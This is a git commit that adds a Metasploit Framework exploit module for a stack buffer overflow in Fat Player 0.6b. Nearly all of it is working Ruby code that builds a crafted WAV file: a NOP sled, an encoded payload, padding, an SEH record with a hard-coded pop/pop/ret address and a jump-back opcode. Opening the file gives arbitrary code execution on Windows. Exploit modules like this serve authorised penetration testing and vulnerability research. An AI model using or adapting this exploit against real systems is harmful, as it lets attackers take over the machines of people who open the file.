exploit module fatplayer_wav.rb from dookie.

git-svn-id: file:///home/svn/framework3/trunk@10764 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2010-10-20 11:53:12 +00:00
parent 44fa5c67a6
commit d384863a83
1 changed files with 82 additions and 0 deletions

View File

@ -0,0 +1,82 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Fat Player Media Player 0.6b0 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Fat Player 0.6b. When
the application is used to import a specially crafted wav file, a buffer overflow occurs
allowing arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Fitts', # Original Exploit
'dookie', # Metasploit Module
],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/15279/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x0046bee3 } ], # p/p/r in FatPlayer.exe
],
'Privileged' => false,
'DisclosureDate' => 'Oct 18 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(100)
sploit << make_nops(100)
sploit << payload.encoded
sploit << rand_text_alpha_upper(3932 - (payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << "\xe9\x60\xf0\xff\xff" # Jump back 4000 bytes
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end